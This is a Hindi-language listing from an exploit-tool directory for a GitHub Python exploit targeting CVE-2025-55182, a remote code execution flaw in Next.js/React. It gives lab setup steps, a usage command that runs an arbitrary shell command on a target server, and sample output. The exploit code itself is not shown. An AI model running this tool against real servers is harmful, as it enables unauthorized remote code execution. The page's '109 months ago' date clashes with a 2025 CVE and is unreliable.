Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-55182 — # CVE-2025-55182 के लिए Python एक्सप्लॉइट Next.js/React में सर्वर-साइड JavaScript इंजेक्शन, जो दूषित multipart फॉर्म डेटा के माध्यम से रिमोट कोड निष्पादन सक्षम करता है। अधिकृत परीक्षण के लिए लैब सेटअप शामिल है। | Kitploit
उपकरण/GitHubGitHub/liamromanis101/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारिमोट एक्सेस टूललैब और अभ्यास
GitHubliamromanis101/cve-2025-55182

cve-2025-55182

# CVE-2025-55182 के लिए Python एक्सप्लॉइट Next.js/React में सर्वर-साइड JavaScript इंजेक्शन, जो दूषित multipart फॉर्म डेटा के माध्यम से रिमोट कोड निष्पादन सक्षम करता है। अधिकृत परीक्षण के लिए लैब सेटअप शामिल है।

रिपॉजिटरी देखें
109 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 पायथन एक्सप्लॉइट

Python 3 स्क्रिप्ट जिसका उपयोग CVE-2025-55182 को प्रदर्शित करने के लिए किया जा सकता है। यह Next.js/React अनुप्रयोगों में सर्वर-साइड JavaScript इंजेक्शन भेद्यता का फायदा उठाती है, जो दूषित मल्टीपार्ट फ़ॉर्म डेटा के माध्यम से रिमोट कोड निष्पादन की अनुमति देती है।

⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।


लैब सेटअप

स्रोत: https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/

root@kitploit:~
npx [email protected] sample-app --yes
cd sample app
npm run build
npm run start

🚀 उपयोग

🔧 आवश्यक शर्तें

root@kitploit:~
pip install requests

उदाहरण उपयोग

root@kitploit:~
python3 exploit_cve_2025_55182.py -u http://localhost:3000 -c "id"

विकल्प

-u प्रोटोकॉल के साथ लक्ष्य डोमेन या IP - http://localhost:3000 -c सर्वर पर निष्पादित करने के लिए कमांड - id

नमूना आउटपुट

root@kitploit:~
[+] Sending exploit to http://localhost:3000 with command: id
[+] Command Result:
uid=1000(app) gid=1000(app) groups=1000(app)

संदर्भ

https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/

टूल डाउनलोड करें